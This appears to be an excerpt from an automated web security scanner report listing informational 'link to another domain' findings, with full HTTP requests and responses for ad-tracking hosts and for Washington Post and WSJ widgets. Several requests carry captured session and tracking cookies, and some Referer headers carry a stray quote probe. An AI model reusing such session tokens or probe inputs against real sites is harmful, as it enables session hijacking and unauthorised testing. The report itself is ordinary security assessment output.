<a href="http://www.thomsonbusinessintelligence.com">

</a>
<a href="http://www.lexisnexis.com">

</a>
...[SNIP]...
<p>eEye Digital Security, a provider of IT security and unified <a href="http://www.eeye.com/Solutions/Business-Need/Vulnerability-Management.aspx?src=prw&amp;371">vulnerability management</a>
...[SNIP]...
ttendees to explore the company's latest innovations, demonstrated in Booth 313, primarily the company...s Retina CS Management solution, Retina Insight reporting engine, as well as add-on modules for <a href="http://www.eeye.com/Solutions/Business-Need/Configuration-Compliance.aspx?src=prw&amp;372">Configuration Compliance</a>
...[SNIP]...
</org> is a <a href="http://www.eeye.com/Products/Retina/Community?src=prw&amp;373">free vulnerability scanner</a> for up to 32 IPs, now being used by nearly four thousand organizations. <a href="http://www.eeye.com/Resources/Security-Center/Research/Zero-Day-Tracker?src=prw&amp;374">Zero Day Tracker</a> provides a catalogue of the newest zero-day vulnerabilities, instructions for quick remediation, and a historical record of past vulnerabilities. <a href="http://www.eeye.com/vef?src=prw&amp;375">eEye...s <org>
...[SNIP]...
<p>Read the full story at <a href="http://www.prweb.com/releases/vulnerability/management/prweb5276794.htm">http://www.prweb.com/releases/vulnerability/management/prweb5276794.htm</a>
...[SNIP]...
<br />
       <iframe src="http://www.facebook.com/plugins/like.php?href=http://insurancenewsnet.com/article.aspx?id=257992&amp;layout=standard&amp;show_faces=true&amp;width=300&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
</div>
           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</div><script src="http://cdn.js-kit.com/scripts/comments.js"></script>
...[SNIP]...
-size: 11px; color: #FFFFFF;
list-style-image: url(images/newfooterimages/bullet.gif); line-height: 28px;
padding-left: 10px;"><a href="http://annuitynews.com" title="AnnuityNews.com - The official news resource for the annuity industry" style="font-family: Arial, Helvetica, sans-serif;
                                       font-size: 11px; color: #FFFFFF; text-decoration: none;">
Annuity News</a>
...[SNIP]...
if; font-size: 11px; color: #FFFFFF;
list-style-image: url(images/newfooterimages/bullet.gif); line-height: 28px;
padding-left: 10px;"><a href="http://insurancenewsnetmagazine.com" alttxt="Insurance Magazine" style="font-family: Arial, Helvetica, sans-serif;
                               font-size: 11px; color: #FFFFFF; text-decoration: none;">
INN Magazine</a>
...[SNIP]...
-size: 11px; color: #FFFFFF;
list-style-image: url(images/newfooterimages/bullet.gif); line-height: 28px;
padding-left: 10px;"><a href="http://www.insurancenewsnetmagazine.com/subscribe.htm"
style="font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #FFFFFF;
text-decoration: none;">
Subscription to Magazine</a>
...[SNIP]...
</script>
<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
<p><img alt="Clicky" width="1" height="1" src="http://in.getclicky.com/176456ns.gif" /></p>
...[SNIP]...

23.31. http://loadus.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /load/?p=218&g=002&c=153225 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; EVX=eJxLtDK0qs60srS0NLVOhLANrIutDC2slAxNzQ3izeONDEziDUwN443iDZWsa2sBRqkNBg%253D%253D; BFF=eJxLtDK3qi62MjS1Ugo2MjDx9HOuMTB0sLS0NFWyzgQKmxtYA2WNrZR8%252Ff1CPHwi48M8gz1DlKwTrQwNiNBogCyLLGEEl0DXYw6XQTMoxNDAxBek2ggqYQiUMIWKIwmhqDXGIuGHwxA%252FXGoRhtTidTpWV5rgcpIJPifhsh8AGMBniA%253D%253D; TFF=eJyNkD0OwyAMRu%252BSE9gGioCFY2RlYKjUrdki7l6jhghhWjHw%252F57hI3kkf75rvxHoCAajc462kDwfPD0GbsYCD9CmRfCm8mrgKXyXvWdvbc3gPdDrtfOeX%252BnIY219GXqSAutzHjBN3fE44UWGdg8Nnr21NYNHkbqR6sebCOcZ8D8vMqD83T4Da2tG%252BQCHK5kT

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:55:55 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:55:55 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Date: Mon, 02 May 2011 01:55:56 GMT
Server: HTTP server
Content-Length: 760

document.write('<img src="http://ad.yieldmanager.com/pixel?id=199372&data=218002&id=901810&data=218002&t=2" width="1" height="1"></img><iframe width="0" height="0" frameborder="0" src="http://loadus.e
...[SNIP]...

23.32. http://loadus.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /load/?p=218&g=002&c=153225 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxlyz0LwjAUheH%252Fkj2Q3Nx83U7adihoEavgVpo0xYLQodRF%252FO%252FajrodXs7TEdJrJkXsWhUs%252By4gJq3GEIwWBlTUIaEaYieCtlF5KXq%252F%252FqQktox924DAqs43aohFlUAbTNy6EDgOSfMgpOE%252BheSSE2iE%252BuW74rYmsMTyXdmU9d3Oj6Ua1WHSl%252FPUTtO8fx7%252F1KnekicGFlA5I6QHsA4NSMey9wcjUTpn; BFF=eJyllM1ShDAMx9%252BFJ2hLsVAuu%252BJBZqQyLsOsp509eva467tbWqamJQGVa39Jmq9%252FrlqU%252BvapeaGzk2CyNc2d8UNVVUVWf9hnxWpLc511r2Z4fnm%252FjO2pHbL6qmXxC0cGKQQigNRHBZIEGjiT3WQtZsAtKOZ38BTZ5ggwRBBD2UZB5oKPT%252Be54AdPSwEK9hQCEUDqowJJAr115wO3vysBQO7eEcuK8ZKzBBwfhyXI3Tu0DEMc4yFGNXmK1GRB6hOGOEJ7BQIJPOEfDoEEHy28FNix1agNFbVBvOCYBdUST%252BkxF0iezien8%252FQcydPFJPPszdo6Oorl2RtqHXtDfUO3w1H6G7Qdk89aOxzH2jHFjL2%252BVg8LekMkdTAgWByM%252F14H%252BgiQev%252B7vDfUTIt2U5%252B7ZLhDbTtEtUM7tEQ21LBj6Vd2%252Bxv6CtRQ; TFF=eJyVkzsSgyAURffiCt59onxsXEZaC4vMpEs6x70HolH5OVA4iHOP3CM4Ge7N8jZg0zCJkTqMWmtuhsmwWZ4Gg706SXag%252F%252B0a5TuXb4M8D9v0yskDKyPsMxJ%252BUvGeFPG758f8mj5zkyF0wgKuTk9J68sKSOQjB7GvwwEnD6yMsGNofSTbTCdG2gH3%252BcgB8T5cHSxWSvzOCNRIxKlm6nS2ty4vzjy0biXn9vGO1AQVdcyTfsfwHJdyfSknD6yMsHOomk7umFHyH46%252Ft5%252Bvcz%252B5KvcNq14JlUa4N0KmGbLNfGL9Ag4DT6U%253D; EVX=eJyFzksOgCAMRdG9uIL3qiiUxTQOGTs07F1qovGXOGtyCr2z9roWTSmFPOvgM%252FKijNoxTLDJBIMh0MTY5aI8NYorowFiMHGVh%252Fpb8ND%252BQ%252Bnafq4tAoxEy%252BA9432o7sVjW5W%252F1XfxtanWDYvaQKE%253D

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: TFF=eJyVkzsSgyAURffiCt59onxsXEZaC4vMpEs6x70HEuMHeAYLR2TukXsEB8etm54O7Com1VOD3lrLVTc4dtPdofNXo8nf6Deck3wT8nWU5%252B77uOf0ipURfo7UMWl4Sar03eNtfAyvsRII5DQQ%252BrSU1d4tgUw%252BkVDLQhxxesXKiFBVCcla6MTIO%252BA8nzgg3Yi9g8dKic8hgemJONfMbM5%252BGPJqy8PaWrO0kfUJaQkm6SiTx47xQS7l2lJOr1gZ4edgrnQKx4yyP3H6vY950f0PJ7rHnF6xyyvhohHOjSA0g9jsSMxvAtxP0w%253D%253D; expires=Tue, 30-Aug-2011 01:57:20 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:57:19 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:57:19 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyFzjEOwyAMheG75ATvGShgDmNlZM5YcffaHaomqdTN0mfwv2vS59Teexm75pgxDmXTjaXCqgmyodDEuI2p%252FGiTUDYDxGApVC4ab0FXCU0%252FlKH%252B8%252FIIsBGewXPG%252FdB6Fz98Vf6t3ou%252Fm9Z6AY0CQKQ%253D; expires=Tue, 30-Aug-2011 01:57:20 GMT; path=/; domain=.exelator.com
Date: Mon, 02 May 2011 01:57:20 GMT
Server: HTTP server
Content-Length: 92

document.write('<img src="http://load.s3.amazonaws.com/pixel.gif" width="0" height="0" />');

23.33. http://loadus.exelator.com/load/net.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9pYi5hZG54cy5jb20vZ2V0dWlkP2h0dHA6Ly9sb2FkbS5leGVsYXRvci5jb20vbG9hZC8%2FcD0yMDQmZz0wMTEmYmk9JFVJRCZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPg%3D%3D&h=f1ffe0dba83264310d05134a36461417 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxdi7EKgzAURf%252Fl7YEkLy%252FROFl1EFqH2kI38cVIhUIGsUvpv9d27HK4HO4ZPfrXugOubQ3FvrQH5cgwW5JWYyCOBucwSiYXMFdyyr8%252FpTxsyzT0Wpq2q36p9RAwarImCpcxCzNHEiyVFXnkmMVMGivxPy%252Fr21dp56Eqm77p7m59bO2Cx0SXcxpSWg%252FPExTvD46AL4M%253D; BFF=eJylk01ywjAMhe%252BSE%252FgvNXY20HRBZhqTgUyGrhiWXXcJ3L3GzriKkULbbPVJsmS9d7ZC2cuX5aUtDoKpxtVXxtfGmLKoPn1Ys8pTaYt25%252Frt%252B8dpaA5NX1RnK80vChmkEIgE8hqdSNao50y192wxAu5BOcZBaJIrEeCIJo7KnTQZF968HceFXyJdCbBwpBCIBPIanUjWaN8e19y%252FrgUAMsSRTMP4irMMbF77RyBDHGamIw7TI052ihTZyYO8Jh1xgPkaNBL4wD8cAgUeeqjSQGOzXWuqa41UwTML6ksipc9cInOGGknPGTkyZ%252BhJztm5OTkGis3ZOUqOnUvB26xhUW8qyogqNxc04n9dR5uL9NHfbfPEJbQZnup%252BkbwXqHiBWBdokpLe7Rtuz5BG; TFF=eJyVkz0SgyAQRu%252FiCXYXlB8bj5GWwiIz6ZLO8e6BaEBZcLBwAOc9%252FT5BZ0nY5W2RbEcgJ%252BhxMsZQNzpLdnlaHP3VK%252FAD%252FKcr4%252FvAi4yncVsePRW1NsPfA3kmNe2k4M%252BeH%252FPLfeauYuhCCwxxBii2lonHAs86yP09lHkqam2GH%252FPWkRSVTITlDnjNsw7I9%252BHYwWutxu%252BMoJ4AqJRMp85%252BGniZeDRGKKrt45VpADXLWDfPGfNz3OoNrZ6KWpvh16jvZArHDIr%252FMP%252FeZ%252F5e9%252BTd6r5pbcb6BdYdKVQ%253D; EVX=eJyFjjEOgDAMA%252F%252FSF9iBQpo%252BJmLszIj6d1qQkAoDW6Szc95ssqNYSinm7b6Rd6NaYFzhqwtmR6SLM%252BRifKhKp1QHxOHSqbxo74I3rU0DKtFEHEXfV%252FXatLSo%252FEW%252FmwZrPQGLujlV

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Date: Mon, 02 May 2011 01:57:11 GMT
Server: HTTP server
Content-Length: 147

<HTML><BODY><img src="http://ib.adnxs.com/getuid?http://loadm.exelator.com/load/?p=204&g=011&bi=$UID&j=0" width="1" height="1"></img></BODY></HTML>

23.34. http://loadus.exelator.com/load/net.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Date: Mon, 02 May 2011 01:55:58 GMT
Server: HTTP server
Content-Length: 385

<HTML><BODY><img src="http://cm.g.doubleclick.net/pixel?nid=exelate&j=0" width="1" height="1"></img><img src="http://ads.adbrite.com/adserver/behavioral-data/8201?d=1031" width="0" height="0" border="0"></img><img src="http://segment-pixel.invitemedia.com/set_partner_uid?partnerID=79&partnerUID=1754bb650623c5be43fca0b57c3910d9&sscs_active=1" width="1" height="1"></img>
...[SNIP]...

23.35. http://media.washingtonpost.com/wp-srv/ad/wp_ad.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.washingtonpost.com
Path:   /wp-srv/ad/wp_ad.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /wp-srv/ad/wp_ad.js?version=172 HTTP/1.1
Host: media.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Fri, 29 Apr 2011 02:09:13 GMT
ETag: "6f64-4dba1dc9"
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Mon, 02 May 2011 23:33:21 GMT
Date: Sun, 01 May 2011 23:33:21 GMT
Connection: close
Content-Length: 28516

wpniSite = 'wpni';
wpniDomain = 'washingtonpost.com';
show_doubleclick_ad = true;
rssString = "fromrss=y";
tileThatGetsDcopt = 1;
hourScope = 24;
numPop = 5;
//this declares what kinds of ads a
...[SNIP]...
<img src="http://media.washingtonpost.com/wp-adv/advertisers/target/images/target_tile_30x90.gif" onclick="wpniAds.target.exec()" id="target-tile" alt="Target" border="0" width="90" height="29"/><img src="http://ad.doubleclick.net/ad/N3550.WashingtonPost/B5040651.3;sz=1x1;ord='+ Math.floor(Math.random()*1E3)+'?" border="0" width="1" height="1" alt="" style="display:none" />'
}

wpniAds.target = {
   exec:function(){
       var b=$("#main-nav-wrapper").next(),a=document.createElement("link");
       $(a).attr({href:"http://media.washingtonpost.com/wp-adv/advertisers/target/eido
...[SNIP]...
</object><img src="http://ad.doubleclick.net/ad/N3550.WashingtonPost/B5040651.2;sz=1x1;ord='+ Math.floor(Math.random()*1E3)+'?" border="0" width="1" height="1" alt="" style="display:none" />')},
   close:function(){
       $("div#target").remove();
       $("div#shell").removeClass("target")
   }
};

//15654-JH
wpniAds.templates.initRule('market_minute');
wpniAds.templates.rules.market_minute
...[SNIP]...
<div style="width:156px;padding:0;margin:0;"><a href="http://ad.doubleclick.net/clk;236932920;29926764;u?http://www.longandfoster.com/Market-Minutes/MarketMinutesReports.aspx" target="_blank" style="text-decoration:none;border:0;color:#464646;"><img src="http://media.washingtonpost.com/wp-adv/advertisers/longfoster/2011/tile/market_minute_logo.png" border="0" height="37" width="156" alt="" />
...[SNIP]...

23.36. http://online.wsj.com/internal/ModTwitWSJMarkets.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /internal/ModTwitWSJMarkets.htm

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /internal/ModTwitWSJMarkets.htm?dojo.preventCache=1304320341570 HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704473104576293321328159878.html?mod=WSJ_newsreel_markets
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=df918f0b-504c-492b-8824-dc0b9235aa6b; s_dbfe=1303590600843; wsjregion=na%2cus; s_vnum=1306182600841%26vn%3D2; __utmz=1.1304311304.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2233%22%2C%22high%22%3A%5B%2267%22%5D%2C%22low%22%3A%5B%2247%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DMon%2C%2002%20May%202011%2005%3A00%3A36%20GMT%7C%7CweatherCode%3D10005; DJSESSION=ORCS%3Dna%2Cus%7C%7CBIZO%3Dbiz%3D1053%3B%7C%7CFREEREGSCRIMCOUNT%3Dnull; _chartbeat2=9b7spduc6sokdd53; rsi_csl=; rsi_segs=; __utma=1.1864565573.1304311304.1304311304.1304311304.1; __utmc=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:00 GMT
Server: Apache
Last-Modified: Tue, 08 Feb 2011 15:23:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Wed, 01 Jun 2011 02:43:00 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: text/html
Content-Length: 3277


<div class="headlineSummary twHeadline">
<h3>Latest Tweets</h3>
</div>
<div class="twLatestTweets headlineSummary twLatestTweets-av">
<ul class="twTweetsItem">


<li>


<a href="http://twitter.com/WSJDealJournal"> <img src="http://a1.twimg.com/profile_images/1206657804/wallstreet3_normal.JPG" alt="http://twitter.com/WSJDealJournal" /></a>
<p><a href="http://twitter.com/WSJDealJournal"><b>
...[SNIP]...
<span class="sourceLink">: Deal Journal: 'American Idol' Backer Robert Sillerman Launches New Media Venture <a href="http://bit.ly/eDTe4z">http://bit.ly/eDTe4z</a>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/WSJDealJournal/statuses/34992944482099201">Moments ago</a>
...[SNIP]...
<li>


<a href="http://twitter.com/WSJHeard"> <img src="http://a2.twimg.com/profile_images/117682816/twitter_heard_normal.jpg" alt="http://twitter.com/WSJHeard" /></a>
<p><a href="http://twitter.com/WSJHeard"><b>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/WSJHeard/statuses/34988503649492992">Moments ago</a>
...[SNIP]...
<li>


<a href="http://twitter.com/WSJMarkets"> <img src="http://a2.twimg.com/profile_images/117675200/twitter_markets_normal.jpg" alt="http://twitter.com/WSJMarkets" /></a>
<p><a href="http://twitter.com/WSJMarkets"><b>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/WSJMarkets/statuses/34988187231191040">Moments ago</a>
...[SNIP]...
<li>


<a href="http://twitter.com/WSJMarkets"> <img src="http://a2.twimg.com/profile_images/117675200/twitter_markets_normal.jpg" alt="http://twitter.com/WSJMarkets" /></a>
<p><a href="http://twitter.com/WSJMarkets"><b>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/WSJMarkets/statuses/34980255227707392">Moments ago</a>
...[SNIP]...
<li>


<a href="http://twitter.com/WSJDealJournal"> <img src="http://a1.twimg.com/profile_images/1206657804/wallstreet3_normal.JPG" alt="http://twitter.com/WSJDealJournal" /></a>
<p><a href="http://twitter.com/WSJDealJournal"><b>
...[SNIP]...
<span class="sourceLink">: Deal Journal: Deals of the Day: The Pritzker Empire Nears Its End <a href="http://bit.ly/eyPeO5">http://bit.ly/eyPeO5</a>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/WSJDealJournal/statuses/34978350837530624">7 min ago</a>
...[SNIP]...
<li>
<a class="followTw" href="http://twitter.com/wsj">Follow WSJ on</a>
...[SNIP]...

23.37. http://pixel.invitemedia.com/admeld_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
